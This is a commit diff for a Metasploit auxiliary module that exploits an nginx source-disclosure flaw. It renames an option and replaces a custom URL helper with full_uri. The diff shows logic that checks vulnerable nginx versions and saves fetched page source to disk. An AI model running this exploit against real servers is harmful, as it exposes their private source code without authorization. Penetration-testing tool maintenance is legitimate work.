Fix nginx_source_disclosure for full_uri
This commit is contained in:
parent
035882702a
commit
7d17c5741b
|
@ -35,22 +35,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('URI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
|
OptString.new('TARGETURI', [true, 'Specify the path to download the file (ex: admin.php)', '/admin.php']),
|
||||||
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
|
OptString.new('PATH_SAVE', [true, 'The path to save the downloaded source code', '']),
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def target_url
|
|
||||||
uri = normalize_uri(datastore['URI'])
|
|
||||||
proto = 'http'
|
|
||||||
if rport == 443 || ssl
|
|
||||||
proto = 'https'
|
|
||||||
end
|
|
||||||
"#{proto}://#{vhost}:#{rport}#{uri}"
|
|
||||||
end
|
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
uri = normalize_uri(datastore['URI'])
|
uri = normalize_uri(target_uri.path)
|
||||||
path_save = datastore['PATH_SAVE']
|
path_save = datastore['PATH_SAVE']
|
||||||
|
|
||||||
vuln_versions = [
|
vuln_versions = [
|
||||||
|
@ -74,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
}, 25)
|
}, 25)
|
||||||
|
|
||||||
if res.nil?
|
if res.nil?
|
||||||
print_error("#{target_url} - nginx - Connection timed out")
|
print_error("#{full_uri} - nginx - Connection timed out")
|
||||||
return
|
return
|
||||||
else
|
else
|
||||||
version = res.headers['Server']
|
version = res.headers['Server']
|
||||||
|
@ -82,17 +73,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
if vuln_versions.include?(version)
|
if vuln_versions.include?(version)
|
||||||
print_good("#{target_url} - nginx - Vulnerable version: #{version}")
|
print_good("#{full_uri} - nginx - Vulnerable version: #{version}")
|
||||||
|
|
||||||
if (res and res.code == 200)
|
if (res and res.code == 200)
|
||||||
|
|
||||||
print_good("#{target_url} - nginx - Getting the source of page #{uri}")
|
print_good("#{full_uri} - nginx - Getting the source of page #{uri}")
|
||||||
|
|
||||||
save_source = File.new("#{path_save}#{uri}","w")
|
save_source = File.new("#{path_save}#{uri}","w")
|
||||||
save_source.puts(res.body.to_s)
|
save_source.puts(res.body.to_s)
|
||||||
save_source.close
|
save_source.close
|
||||||
|
|
||||||
print_status("#{target_url} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
|
print_status("#{full_uri} - nginx - File successfully saved: #{path_save}#{uri}") if (File.exists?("#{path_save}#{uri}"))
|
||||||
|
|
||||||
else
|
else
|
||||||
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
|
print_error("http://#{vhost}:#{rport} - nginx - Unrecognized #{res.code} response")
|
||||||
|
@ -102,9 +93,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
else
|
else
|
||||||
if version =~ /nginx/
|
if version =~ /nginx/
|
||||||
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
|
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not vulnerable - Version #{version}")
|
||||||
else
|
else
|
||||||
print_error("#{target_url} - nginx - Cannot exploit: the remote server is not ngnix")
|
print_error("#{full_uri} - nginx - Cannot exploit: the remote server is not ngnix")
|
||||||
end
|
end
|
||||||
return
|
return
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue